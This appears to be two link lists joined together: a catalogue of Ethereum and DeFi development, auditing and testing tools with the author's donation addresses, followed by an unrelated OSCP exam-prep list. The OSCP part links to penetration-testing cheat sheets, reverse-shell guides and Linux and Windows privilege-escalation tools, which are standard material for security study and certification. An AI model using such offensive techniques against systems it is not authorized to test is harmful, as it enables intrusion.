- [Blockchain Threat Intelligence](https://blockthreat.substack.com/) - Newsletter covering the latest security news, tools, events, vulnerabilities, and threats in the cryptocurrency landscape. Also [supports this repo.](https://github.com/openblocksec/blocksec-incidents)
- [Blockchain Graveyard](https://magoo.github.io/Blockchain-Graveyard/) - A list of all massive security breaches or thefts involving blockchains.
# Tools Collection
#### Ethereum Tools
- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)
- [Ethstats](https://ethstats.io)
- [Node Stats](https://ethernodes.org)
- [solidity-by-example.org](https:/solidity-by-example.org)
- [EVM Networks List](https://chainid.network)
- [BIP39 Derivation](https://iancoleman.io/bip39)
- [Vanity Generator](https://github.com/johguse/profanity)
- [Web Vanity Generator](https://vanity-eth.tk)
- [Vanity Eth Generators](https://github.com/search?q=eth+vanity)
- [FindETH](https://findeth.io)
- [Eth Tx Decoder](https://antoncoding.github.io/eth-tx-decoder)
- [Ethereum input data decoder](https://lab.miguelmota.com/ethereum-input-data-decoder)
- [Ethereum Gas Charts](https://ethereumprice.org/gas)
- [Ethereum TxPool Statistics](https://txpool.zengo.com/)
- [Gas Prices Dashboard ](https://explore.duneanalytics.com/public/dashboards/qswVMdzbyiiZFdnCDSwx1jfYLOjdaokM4CSGNxsH)
- [The UI from ABI](https://ethcontract.watch)
- [Oracles Club](https://oracles.club)
- [Tx Combo](https://furucombo.app)
- [ETH or ERC-20 Mass-sender](https://disperse.app)
- [BulkSender](https://bulksender.app)
- [ERC20 Meta Token Wrapper](https://github.com/arcadeum/erc20-meta-token)
- [Cancel Ethereum Transaction](https://github.com/mds1/Cancel-Ethereum-Transactions)
- [Fees WTF Calculator](https://fees.wtf)
- [Spend Gas Stats](https://txn.finance)
- [Pools Stats](https://pools.fyi)
- [Solhint](https://github.com/protofire/solhint)
- [Solium](https://github.com/duaraghav8/Solium)
- [Sol-tester](https://github.com/androlo/sol-tester)
- [Solidity-coverage](https://github.com/sc-forks/solidity-coverage)
- [TypeChain](https://github.com/ethereum-ts/TypeChain)
- [Tenderly](https://tenderly.co/)
- [Contract Library](https://library.dedaub.com/)
#### Libraries
- [dapp-bin](https://github.com/ethereum/dapp-bin) - Ethereum repo providing implementations for many common data structures and utilities in Solidity, Serpent and LLL.
- [Solidity Collections](https://github.com/ethereum/wiki/wiki/Solidity-Collections) - Collections of code snippets and utility libraries.
- [OpenZeppelin](https://openzeppelin.org/) - Framework to build secure smart contracts.
#### Ideas
- [Open DeFi Problems](https://mirror.xyz/0xemperor.eth/0guEj0CYt5V8J5AKur2_UNKyOhONr1QJaG4NGDF0YoQ)
- [What to build?](https://github.com/0xngmi/ideas)
- [Startup ideas](https://alliancedao.notion.site/Crypto-Web3-Startup-Ideas-2023-Edition-48d40ccadeeb42a48056659fcce109b1)
- [polymarket.com](https://polymarket.com)
- [How to use PolyMarket](https://medium.com/coinmonks/how-to-use-polymarket-9ee1577fd671)
- [Ideas Lists](https://sovs.notion.site/Education-00cadae763ea4d30ae8149041718fd7a)
- [hummingbot.org](https://hummingbot.org/)
- [t.me/soliditypedia](https://t.me/soliditypedia)
- [My Blog!](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)
#### Popular Smart Contract Libraries
- [Zeppelin](https://github.com/OpenZeppelin/openzeppelin-contracts) - Contains tested reusable smart contracts like SafeMath and OpenZeppelin SDK [library](https://github.com/OpenZeppelin/openzeppelin-sdk) for smart contract upgradeability
- [cryptofin-solidity](https://github.com/cryptofinlabs/cryptofin-solidity) - A collection of Solidity libraries for building secure and gas-efficient smart contracts on Ethereum.
- [Modular Libraries](https://github.com/Modular-Network/ethereum-libraries) - A group of packages built for use on blockchains utilising the Ethereum Virtual Machine
- [DateTime Library](https://github.com/bokkypoobah/BokkyPooBahsDateTimeLibrary) - A gas-efficient Solidity date and time library
- [ARC](https://github.com/daostack/arc) - an operating system for DAOs and the base layer of the DAO stack.
- [0x](https://github.com/0xProject) - DEX protocol
- [Token Libraries with Proofs](https://github.com/sec-bit/tokenlibs-with-proofs) - Contains correctness proofs of token contracts wrt. given specifications and high-level properties
- [Provable API](https://github.com/provable-things/ethereum-api) - Provides contracts for using the Provable service, allowing for off-chain actions, data-fetching, and computation
- [ABDK Libraries for Solidity](https://github.com/abdk-consulting/abdk-libraries-solidity) - Fixed-point (64.64 bit) and IEEE-754 compliant quad precision (128 bit) floating-point math libraries for Solidity
#### Patterns for Smart Contracts
- [Dappsys: Safe, simple, and flexible Ethereum contract building blocks](https://github.com/dapphub/dappsys)
- [MakerDAO](https://github.com/makerdao/maker-otc)
- [The TAO](https://github.com/ryepdx/the-tao)
- [Dapp-a-day 1-10](https://steemit.com/@nikolai)
- [Dapp-a-day 11-25](https://steemit.com/@nexusdev)
- [OpenZeppelin Contracts: An open framework of reusable and secure smart contracts in the Solidity language.](https://github.com/OpenZeppelin/openzeppelin-contracts)
- [Blog about Best Practices with Security Audits](https://blog.openzeppelin.com/)
- [Advanced Workshop with Assembly](https://github.com/androlo/solidity-workshop)
- [Simpler Ethereum Multisig](https://medium.com/@ChrisLundkvist/exploring-simpler-ethereum-multisig-contracts-b71020c19037) - especially section _Benefits_
- [CryptoFin Solidity Auditing Checklist](https://github.com/cryptofinlabs/audit-checklist) - A checklist of common findings, and issues to watch out for when auditing a contract for a mainnet launch.
- [aragonOS: A smart contract framework for building DAOs, Dapps and protocols](https://hack.aragon.org/docs/aragonos-intro.html)
- [Checks Effects Interactions Pattern](https://fravoll.github.io/solidity-patterns/checks_effects_interactions.html)
#### Upgradeability
- [Blog von Elena Dimitrova, Dev at colony.io](https://blog.colony.io/author/elena/)
- [Library driven development](https://blog.aragon.org/library-driven-development-in-solidity-2bebcaf88736)
- [Advanced Solidity code deployment techniques](https://blog.aragon.org/advanced-solidity-code-deployment-techniques-dc032665f434/)
- [OpenZeppelin on Proxy Libraries](https://blog.openzeppelin.com/proxy-libraries-in-solidity-79fbe4b970fd/)
#### Developer Tools
- [Check out our blog!](https://blog.pessimistic.io/)
- [CryptoFin Solidity Auditing Checklist](https://github.com/cryptofinlabs/audit-checklist) - A checklist of common findings, and issues to watch out for when auditing a contract for a mainnet launch.
- [MythX](https://mythx.io/) - Security verification platform and tools ecosystem for Ethereum developers
- [Mythril](https://github.com/ConsenSys/mythril) - Open-source EVM bytecode security analysis tool
- [Oyente](https://github.com/melonproject/oyente) - Alternative static smart contract security analysis
- [Securify](https://securify.chainsecurity.com/) - Security scanner for Ethereum smart contracts
- [SmartCheck](https://tool.smartdec.net/) - Static smart contract security analyzer
- [Ethersplay](https://github.com/crytic/ethersplay) - EVM disassembler
- [Evmdis](https://github.com/Arachnid/evmdis) - Alternative EVM disassembler
- [Hydra](https://github.com/IC3Hydra/Hydra) - Framework for cryptoeconomic contract security, decentralised security bounties
- [Solgraph](https://github.com/raineorshine/solgraph) - Visualise Solidity control flow for smart contract security analysis
- [Manticore](https://github.com/trailofbits/manticore) - Symbolic execution tool on Smart Contracts and Binaries
- [Slither](https://github.com/crytic/slither) - A Solidity static analysis framework
- [Adelaide](https://github.com/sec-bit/adelaide) - The SECBIT static analysis extension to Solidity compiler
- [solc-verify](https://github.com/SRI-CSL/solidity/) - A modular verifier for Solidity smart contracts
- [Solidity security blog](https://github.com/sigp/solidity-security-blog) - Comprehensive list of known attack vectors and common anti-patterns
- [Awesome Buggy ERC20 Tokens](https://github.com/sec-bit/awesome-buggy-erc20-tokens) - A Collection of Vulnerabilities in ERC20 Smart Contracts With Tokens Affected
- [Free Smart Contract Security Audit](https://callisto.network/smart-contract-audit/) - Free smart contract security audits from Callisto Network
- [Piet](https://piet.slock.it) - A visual Solidity architecture analyzer
- [Contract Library](https://library.dedaub.com) - Decompiler and vulnerability scanner for deployed contracts
#### Frontend Ethereum APIs
- [Web3.js](https://github.com/ethereum/web3.js/) - Javascript Web3
- [Eth.js](https://github.com/ethjs) - Javascript Web3 alternative
- [Ethers.js](https://github.com/ethers-io/ethers.js/) - Javascript Web3 alternative, useful utilities and wallet features
- [light.js](https://github.com/paritytech/js-libs/tree/master/packages/light.js) A high-level reactive JS library optimized for light clients.
- [Web3Wrapper](https://github.com/0xProject/0x-monorepo/tree/development/packages/web3-wrapper) - Typescript Web3 alternative
- [Ethereumjs](https://github.com/ethereumjs/) - A collection of utility functions for Ethereum like [ethereumjs-util](https://github.com/ethereumjs/ethereumjs-util) and [ethereumjs-tx](https://github.com/ethereumjs/ethereumjs-tx)
- [Alchemy](https://docs.alchemy.com/docs)
- [flex-contract](https://github.com/merklejerk/flex-contract) and [flex-ether](https://github.com/merklejerk/flex-ether) - Modern, zero-configuration, high-level libraries for interacting with smart contracts and making transactions.
- [ez-ens](https://github.com/merklejerk/ez-ens) - Simple, zero-configuration Ethereum Name Service address resolver.
- [web3x](https://github.com/xf00f/web3x) - A TypeScript port of web3.js. Benefits includes tiny builds and full type safety, including when interacting with contracts.
- [Nethereum](https://github.com/Nethereum/) - Cross-platform Ethereum development framework
- [dfuse](https://github.com/dfuse-io/client-js) - A TypeScript library to use [dfuse Ethereum API](https://dfuse.io)
- [Drizzle](https://github.com/truffle-box/drizzle-box) - Redux library to connect a frontend to a blockchain
- [Tasit SDK](https://github.com/tasitlabs/tasitsdk) - A JavaScript SDK for making native mobile Ethereum dapps using React Native
- [useMetamask](https://github.com/mdtanrikulu/use-metamask) - a custom React Hook to manage Metamask in Ethereum ĐApp projects
- [WalletConnect](https://walletconnect.org/) - Open protocol for connecting Wallets to Dapps
- Strictly Typed - Javascript alternatives
- [elm-ethereum](https://github.com/cmditch/elm-ethereum)
- [purescript-web3](https://github.com/f-o-a-m/purescript-web3)
- [ChainAbstractionLayer](https://github.com/liquality/chainabstractionlayer) - Communicate with different blockchains (including Ethereum) using a single interface.
- [Delphereum](https://github.com/svanas/delphereum) - a Delphi interface to the Ethereum blockchain that allows for development of native dApps for Windows, macOS, iOS, and Android.
- [Torus](https://tor.us/) - Open-sourced SDK to build dapps with a seamless onboarding UX
- [Fortmatic](https://fortmatic.com/) - A simple to use SDK to build web3 dApps without extensions or downloads.
- [Portis](https://portis.io/) - A non-custodial wallet with an SDK that enables easy interaction with DApps without installing anything.
- [create-eth-app](https://github.com/paulrberg/create-eth-app) - Create Ethereum-powered front-end apps with one command.
- [Scaffold-ETH](https://github.com/austintgriffith/scaffold-eth) - Beginner friendly forkable github for getting started building smart contracts.
- [Jolly Roger](https://jolly-roger.eth.link/) - dApp framework using ethereum, buidler, svelte and thegraph
- [Notify.js](https://blocknative.com/notify) - Deliver real-time notifications to your users. With built-in support for Speed-Ups and Cancels, Blocknative Notify.js helps users transact with confidence. Notify.js is easy to integrate and quick to customize.
#### Backend Ethereum APIs
- [Web3.py](https://github.com/ethereum/web3.py) - Python Web3
- [Web3.php](https://github.com/sc0Vu/web3.php) - PHP Web3
- [Ethereum-php](https://github.com/digitaldonkey/ethereum-php) - PHP Web3
- [Web3j](https://github.com/web3j/web3j) - Java Web3
- [Nethereum](https://nethereum.com/) - .Net Web3
- [Ethereum.rb](https://github.com/EthWorks/ethereum.rb) - Ruby Web3
- [rust-web3](https://github.com/tomusdrw/rust-web3) - Rust Web3
- [ethers-rs](https://github.com/gakonst/ethers-rs/) - Ethers-rs
- [Web3.hs](https://hackage.haskell.org/package/web3) - Haskell Web3
- [KEthereum](https://github.com/komputing/KEthereum) - Kotlin Web3
- [Eventeum](https://github.com/ConsenSys/eventeum) - A bridge between Ethereum smart contract events and backend microservices, written in Java by Kauri
- [Ethereumex](https://github.com/mana-ethereum/ethereumex) - Elixir JSON-RPC client for the Ethereum blockchain
- [Ethereum-jsonrpc-gateway](https://github.com/HydroProtocol/ethereum-jsonrpc-gateway) - A gateway that allows you to run multiple Ethereum nodes for redundancy and load-balancing purposes. Can be ran as an alternative to (or on top of) Infura. Written in Golang.
- [EthContract](https://github.com/AgileAlpha/eth_contract) - A set of helper methods to help query ETH smart contracts in Elixir
- [Ethereum Contract Service](https://github.com/mesg-foundation/service-ethereum-contract) - A MESG Service to interact with any Ethereum contract based on its address and ABI.
- [Ethereum Service](https://github.com/mesg-foundation/service-ethereum) - A MESG Service to interact with events from Ethereum and interact with it.
- [Marmo](https://marmo.io/) - Python, JS, and Java SDK for simplifying interactions with Ethereum. Uses relayers to offload transaction costs to relayers.
- [Ethereum Logging Framework](https://bitbucket.csiro.au/users/kli039/repos/ethereum-logging-framework/browse) - provides advanced logging capabilities for Ethereum applications and networks including a query language, query processor, and logging code generation
#### Ethereum Clients
- [Besu](https://besu.hyperledger.org/en/latest/) - an open-source Ethereum client developed under the Apache 2.0 license and written in Java. The project is hosted by Hyperledger.
- [Geth](https://geth.ethereum.org/docs/) - Go client
- [Erigon](https://github.com/ledgerwatch/erigon) - a mostly Go implementation of Ethereum client built on the efficiency frontier
- [Akula](https://github.com/akula-bft/akula) - Rust implementation
- [Nethermind](https://github.com/NethermindEth/nethermind) - .NET Core client
- [Infura](https://infura.io/) - A managed service providing Ethereum client standards-compliant APIs
- [Trinity](https://trinity.ethereum.org/) - Python client using [py-evm](https://github.com/ethereum/py-evm)
- [Ethereumjs](https://github.com/ethereumjs/ethereumjs-client) - JS client using [ethereumjs-vm](https://github.com/ethereumjs/ethereumjs-vm)
- [Seth](https://github.com/dapphub/dapptools/tree/master/src/seth) - Seth is an Ethereum client tool—like a "MetaMask for the command line"
- [Quorum](https://github.com/jpmorganchase/quorum) - A permissioned implementation of Ethereum supporting data privacy by [JP Morgan](https://jpmorgan.com/quorum)
- [Awesome Quorum](https://github.com/ConsenSys/awesome-quorum) - A curated list of awesome softwares, libraries, tools and more to build on ConsenSys Quorum.
- [Chainstack](https://chainstack.com/) - A managed service providing shared and dedicated Geth nodes
- [QuikNode](https://quiknode.io/) - Blockchain developer cloud with API access and node-as-a-service.
- [Watchdata](https://watchdata.io) - Provide simple and reliable API access to Ethereum blockchain
#### Storage
- [DB3 Network](https://github.com/dbpunk-labs/db3) - Decentralized Firebase Firestore Alternative.
- [IPFS](https://ipfs.io/) - Decentralised storage and file referencing
- [Mahuta](https://github.com/ConsenSys/Mahuta) - IPFS Storage service with added search capability, formerly IPFS-Store
- [OrbitDB](https://github.com/orbitdb/orbit-db) - Decentralised database on top of IPFS
- [JS IPFS API](https://github.com/ipfs/js-ipfs-http-client) - A client library for the IPFS HTTP API, implemented in JavaScript
- [TEMPORAL](https://github.com/RTradeLtd/Temporal) - Easy to use API into IPFS and other distributed/decentralised storage protocols
- [PINATA](https://pinata.cloud) - The Easiest Way to Use IPFS
- [Swarm](https://swarm-gateways.net/) - Distributed storage platform and content distribution service, a native base layer service of the Ethereum web3 stack
- [Infura](https://infura.io/) - A managed IPFS API Gateway and pinning service
- [Aleph.im](https://aleph.im/) - an offchain incentivized peer-to-peer cloud project (database, file storage, computing and DID) compatible with ETH and IPFS.
- [Fleek](https://fleek.co/) - similar to netlify but uses ipfs for hosting websites.
#### Bootstrap/Out-of-Box tools
- [Truffle boxes](https://trufflesuite.com/boxes) - Packaged components for the Ethereum ecosystem
- [Create Eth App](https://github.com/paulrberg/create-eth-app) - Create Ethereum-powered frontend apps with one command
- [Besu Private Network](https://besu.hyperledger.org/en/stable/Tutorials/Quickstarts/Azure-Private-Network-Quickstart/) - Run a private network of Besu nodes in a Docker container
- [Testchains](https://github.com/Nethereum/TestChains) - Pre-configured .NET devchains for fast response (PoA)
- [Blazor/Blockchain Explorer](https://github.com/Nethereum/NethereumBlazor) - Wasm blockchain explorer (functional sample)
- [Local Raiden](https://github.com/ConsenSys/Local-Raiden) - Run a local Raiden network in docker containers for demo and testing purposes
- [Private networks deployment scripts](https://github.com/ConsenSys/private-networks-deployment-scripts) - Out-of-the-box deployment scripts for private PoA networks
- [Local Ethereum Network](https://github.com/ConsenSys/local_ethereum_network) - Out-of-the-box deployment scripts for private PoW networks
- [Kaleido](https://kaleido.io/) - Use Kaleido for spinning up a consortium blockchain network. Great for PoCs and testing
- [Cheshire](https://github.com/endless-nameless-inc/cheshire) - A local sandbox implementation of the CryptoKitties API and smart contracts, available as a Truffle Box
- [aragonCLI](https://github.com/aragon/aragon-cli) - aragonCLI is used to create and develop Aragon apps and organizations.
- [ColonyJS](https://github.com/JoinColony/colonyJS) - JavaScript client that provides an API for interacting with the Colony Network smart contracts.
- [ArcJS](https://github.com/daostack/arc.js) - Library that facilitates javascript application access to the DAOstack Arc ethereum smart contracts.
- [Onboard.js](https://blocknative.com/onboard) - Blocknative Onboard is the quick and easy way to add multi-wallet support to your project. With built-in modules for more than 20 unique hardware and software wallets, Onboard saves you time and headaches.
- [web3-react](https://github.com/NoahZinsmeister/web3-react) - React framework for building single-page Ethereum dApps
#### Ethereum ABI (Application Binary Interface) tools
- [ABI decoder](https://github.com/ConsenSys/abi-decoder) - library for decoding data params and events from Ethereum transactions
- [ABI-gen](https://github.com/0xProject/0x-monorepo/tree/development/packages/abi-gen) - Generate Typescript contract wrappers from contract ABI's.
- [Ethereum ABI UI](https://github.com/hiddentao/ethereum-abi-ui) - Auto-generate UI form field definitions and associated validators from an Ethereum contract ABI
- [headlong](https://github.com/esaulpaugh/headlong/) - type-safe Contract ABI and Recursive Length Prefix library in Java
- [EasyDapper](https://www.easydapper.com) - Generate dapps from Truffle artifacts, deploy contracts on public/private networks, offers live customizable public page to interact with contracts.
- [One Click dApp](https://oneclickdapp.com) - Instantly create a dApp at a unique URL using the ABI.
- [Truffle Pig](https://npmjs.com/package/trufflepig) - a development tool that provides a simple HTTP API to find and read from Truffle-generated contract files, for use during local development. Serves fresh contract ABIs over http.
- [Ethereum Contract Service](https://github.com/mesg-foundation/service-ethereum-contract) - A MESG Service to interact with any Ethereum contract based on its address and ABI.
- [Nethereum-CodeGenerator](https://github.com/StefH/Nethereum-CodeGenerator) - A web based generator which creates a Nethereum based C# Interface and Service based on Solidity Smart Contracts.
# Testing Tools
- [Solidity code coverage](https://github.com/0xProject/0x-monorepo/tree/development/packages/sol-coverage) - Solidity code coverage tool
- [Solidity coverage](https://github.com/sc-forks/solidity-coverage) - Alternative code coverage for Solidity smart-contracts
- [Solidity function profiler](https://github.com/EricR/sol-function-profiler) - Solidity contract function profiler
- [Sol-profiler](https://github.com/Aniket-Engg/sol-profiler) - Alternative and updated Solidity smart contract profiler
- [Espresso](https://github.com/hillstreetlabs/espresso) - Speedy, parallelised, hot-reloading solidity test framework
- [Eth tester](https://github.com/ethereum/eth-tester) - Tool suite for testing Ethereum applications
- [Cliquebait](https://github.com/f-o-a-m/cliquebait) - Simplifies integration and accepting testing of smart contract applications with docker instances that closely resembles a real blockchain network
- [Hevm](https://github.com/dapphub/dapptools/tree/master/src/hevm) - The hevm project is an implementation of the Ethereum virtual machine (EVM) made specifically for unit testing and debugging smart contracts
- [Ethereum graph debugger](https://github.com/fergarrui/ethereum-graph-debugger) - Solidity graphical debugger
- [Tenderly CLI](https://github.com/Tenderly/tenderly-cli) - Speed up your development with human readable stack traces
- [Solhint](https://github.com/protofire/solhint) - Solidity linter that provides security, style guide and best practice rules for smart contract validation
- [Ethlint](https://github.com/duaraghav8/Ethlint) - Linter to identify and fix style & security issues in Solidity, formerly Solium
- [Decode](https://github.com/hacker-DOM/decode) - npm package which parses tx's submitted to a local testrpc node to make them more readable and easier to understand
- [truffle-assertions](https://github.com/rkalis/truffle-assertions) - An npm package with additional assertions and utilities used in testing Solidity smart contracts with truffle. Most importantly, it adds the ability to assert whether specific events have (not) been emitted.
- [Psol](https://github.com/Lamarkaz/psol) - Solidity lexical preprocessor with mustache.js-style syntax, macros, conditional compilation and automatic remote dependency inclusion.
- [solpp](https://github.com/merklejerk/solpp) - Solidity preprocessor and flattener with a comprehensive directive and expression language, high precision math, and many useful helper functions.
- [Decode and Publish](https://flightwallet.github.io/decode-eth-tx/) – Decode and publish raw ethereum tx. Similar to https://live.blockcypher.com/btc-testnet/decodetx/
- [Doppelgänger](https://getdoppelganger.io/) - a library for mocking smart contract dependencies during unit testing.
- [rocketh](https://github.com/wighawag/rocketh) - A simple lib to test ethereum smart contract that allow to use whatever web3 lib and test runner you choose.
- [pytest-cobra](https://github.com/cobraframework/pytest-cobra) - PyTest plugin for testing smart contracts for Ethereum blockchain.
- [ERCx](https://ercx.runtimeverification.com) - Testing tool with a Web interface to test conformance and properties of ERC-20 tokens. Based on Foundry forge.
#### Transaction Visualization, Scoring & Tracking:
- Check out Author's methodology, carefully read all parts of [thread](https://twitter.com/officer_cia/status/1493395239905734667?s=20&t=rFmBq_f9juLPNWslwrnB7Q)
- Follow my project: [On-Chain Investigations Tools List](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List)
#### What's next?
- [Take a look](https://telegra.ph/Solidity-Tutorials-12-21)
- [Carefully check out](https://telegra.ph/All-resources-to-become-a-smart-contract-auditor-09-11)
- [Work](https://t.me/s/officer_cia/700)
#### Work...?
- [Crypto Jobs List - Main](https://docs.google.com/spreadsheets/d/1AfCSrl98bNGE5_Iq-N6zYx5xmuCBpoEkiBCDQD5Keh4/edit#gid=0)
- [web3.smsunarto.com](https://web3.smsunarto.com)
- [2023 Global Crypto Events & Hackathons](https://docs.google.com/spreadsheets/d/1uRB5lt67Eoxfattljko7IvuQvpqkLt66YpOev9XJ22o/edit?usp=sharing)
- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)
- [Jobsincrypto](https://twitter.com/jobsincrypto)
- [CryptoJobsList](https://twitter.com/CryptoJobsList)
- [LobsterHR](https://t.me/lobsters_hr)
- [DeveloperDAO](https://twitter.com/developer_dao)
- [LidoGrants](https://twitter.com/LidoGrants)
- [GitCoin](https://twitter.com/gitcoin)
- [anonfriendly.com](http://anonfriendly.com)
- [Web3grants](https://twitter.com/web3grants)
- [hackathons.live](https://hackathons.live)
- [hackenproof.com](http://hackenproof.com)
- [bbscope](https://github.com/sw33tLie/bbscope)
- [immunefi.com](https://immunefi.com)
- [code4rena.com](https://code4rena.com)
- [sherlock.xyz](https://www.sherlock.xyz)
- [spearbit.com](https://spearbit.com)
- [Web3SecurityDAO](https://twitter.com/Web3SecurityDAO)
- [WHITE HAT DAO](https://twitter.com/White_Hat_DAO)
- [Hats.Finance](https://twitter.com/HatsFinance)
- [crypto-jobs-fyi.github.io](https://crypto-jobs-fyi.github.io/web/)
- [auditjobs.xyz](https://auditjobs.xyz/)
- [intropia.io/hire](https://intropia.io/hire)
- [www.jobstash.xyz](https://www.jobstash.xyz)
- [frontrunnrs.xyz](https://frontrunnrs.xyz)
- [www.jobprotocol.xyz](https://www.jobprotocol.xyz)
## Support Me:
Support is **very** important to me, with it I can do what I love - educating DeFi & Crypto users :sparkling_heart: First, a few words, dear friends... I want to thank everyone who sent me donations!
[![Supported by GitCoin](https://img.shields.io/badge/Support%20via-GitCoin-yellowgreen)](https://gitcoin.co/grants/3150/defi-developer-roadmap)
The best thing is to support me directly by donating to my address on Ethereum Main-net or any of the compatible networks or to any address from the list below:
- **[0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A](https://etherscan.io/address/0xB25C5E8fA1E53eEb9bE3421C59F6A66B786ED77A)** — ERC20 & ETH [officercia.eth](https://etherscan.io/enslookup-search?search=officercia.eth)
- **[17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU](https://blockchair.com/bitcoin/address/17Ydx9m7vrhnx4XjZPuGPMqrhw3sDviNTU)** - BTC
- **4AhpUrDtfVSWZMJcRMJkZoPwDSdVG6puYBE3ajQABQo6T533cVvx5vJRc5fX7sktJe67mXu1CcDmr7orn1CrGrqsT3ptfds** - Monero XMR
- You can also support me by minting one of my [Mirror articles NFTs](https://officercia.mirror.xyz/)!
#
- [Check out my Telegram Channel](https://t.me/officer_cia)
- [Follow my Twitter](https://twitter.com/officer_cia)
- [Track all my activities](https://t.me/officer_cia/296)
- [All my Socials](https://t.me/officer_cia/296)
##
**Thank you! Stay safe!**
|
# OSCP Prep Materials
- [TJnull’s list updated list 2021](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0)
## OSCP Journeys and Preparation guides:
- [parthdeshani,Pass OSCP like a Boss](https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d)
- [Tj Null,Prep Guide](https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html)
- [calmhavoc,OSCP.The Pain and Pleasure](https://medium.com/@calmhavoc/oscp-the-pain-the-pleasure-a506962baad)
- [burntmybagel,OSCP-Prep](https://github.com/burntmybagel/OSCP-Prep)
- [m4lv0id,"i did oscp"](https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19)
- [gr0sabi,OSCP best practices](https://gr0sabi.github.io/security/oscp-insights-best-practices-resources/#note-taking)
- [satiex](https://satiex.net/2019/04/10/offensive-security-certified-professional/amp/?__twitter_impression=true)
- [jason bernier,try harder](https://hakin9.org/try-harder-my-penetration-testing-with-kali-linux-oscp-review-and-courselab-experience-my-oscp-review-by-jason-bernier/)
- [theslickgeek,OSCP](https://theslickgeek.com/oscp/)
- [dann,OSCP review](http://dann.com.br/oscp-offensive-security-certification-pwk-course-review/)
- [h0mbre,OSCP](https://h0mbre.github.io/OSCP/#)
- [prasannakumar,my-walk-towards-cracking-OSCP](https://prasannakumar.in/infosec/my-walk-towards-cracking-oscp/)
- [infosecuritygeek,oscp journey](https://infosecuritygeek.com/my-oscp-journey/)
- [acknak,oscp-tools](https://acknak.fr/en/articles/oscp-tools/)
- [r3dg33k,oscp-exp](https://r3dg33k.com/2018-10-09-oscp-exp/)
- [jimwilbur,oscp-links](https://www.jimwilbur.com/oscp-links/)
- [pulse,road-oscp-oluwaseun-oyelude-oscp](https://www.linkedin.com/pulse/road-oscp-oluwaseun-oyelude-oscp)
- [scund00r,passing-oscp](https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html)
- [jhalon,OSCP-Review](https://jhalon.github.io/OSCP-Review/)
- [alienvault,how-to-prepare-to-take-the-oscp](https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp)
- [niiconsulting,a-detail-guide-on-oscp-preparation-from-newbie-to-oscp](https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/)
- [thor-sec,oscp_review](https://thor-sec.com/review/oscp/oscp_review/)
## Cheatsheets :
- [P3t3rp4rk3r,OSCP-cheat-sheet](https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1?files=1)
- [crsfrtw,oscp](https://github.com/crsftw/oscp?files=1)
- [h4ck,cheetsheet](https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt)
- [sushant747,total-oscp-guide](https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html)
- [jok3rsecurity](https://jok3rsecurity.com/cheat-sheet/)
- [UserXGnu,OSCP-cheat-sheet](https://github.com/UserXGnu/OSCP-cheat-sheet-1?files=1)
- [archive](https://archive.is/IZLjv)
- [highon-coffee,penetration-testing-tools-cheat-sheet](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)
- [ramunix,oscp-cheat-sheet](http://ramunix.blogspot.com/2016/10/oscp-cheat-sheet.html?m=1)
- [0xc0ffe,OSCP-Goldmine](http://0xc0ffee.io/blog/OSCP-Goldmine)
- [hausec,pentesting-cheatsheet](https://hausec.com/pentesting-cheatsheet/)
- [jordanpotti](https://jordanpotti.com/oscp/)
- [ucki,URP-T-v](https://github.com/ucki/URP-T-v.01?files=1)
- [propriacausa,oscp-notes](https://blog.propriacausa.de/wp-content/uploads/2016/07/oscp_notes.html)
- [zsahi,oscp-notes-collection](https://zsahi.wordpress.com/oscp-notes-collection/)
- [weaknetlabs,Penetration-Testing-Grimoir](https://github.com/weaknetlabs/Penetration-Testing-Grimoire?files=1)
- [OlivierLaflamme,Cheatsheet-God](https://github.com/OlivierLaflamme/Cheatsheet-God?files=1)
- [cymtrick.oscp-cheat-sheet](https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad)
## Linux Privilege Escalation :
- [adithyanak,oscp-2020,privesc](https://adithyanak.gitbook.io/oscp-2020/privilege-escalation)
- [sushant747,total-oscp-guide](https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html)
- [Ignitetechnologies](https://github.com/Ignitetechnologies/Privilege-Escalation)
- [gtfobins](https://gtfobins.github.io/)
- [g0tm1lk,basic linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
## Linux Privesc Tools :
- [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
- [SUIDENUM](https://github.com/Anon-Exploiter/SUID3NUM)
- [LinEnum.sh](https://github.com/rebootuser/LinEnum)
- [linpeas.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
- [Linprivchecker](https://github.com/sleventyeleven/linuxprivchecker)
- [pspy](https://github.com/DominicBreuker/pspy)
## Windows Privilege Escalation :
- [adithyanak,windows privesc](https://adithyanak.gitbook.io/oscp-2020/windows-privilege-escalation)
- [sushant747,windows Privesc](https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html)
- [swisskyrepo](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
- [absolomb,Win-Privesc](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
- [fuzzysec](http://www.fuzzysecurity.com/tutorials/16.html)
- [hacktricks,Win PrivEsc Checlist](https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation)
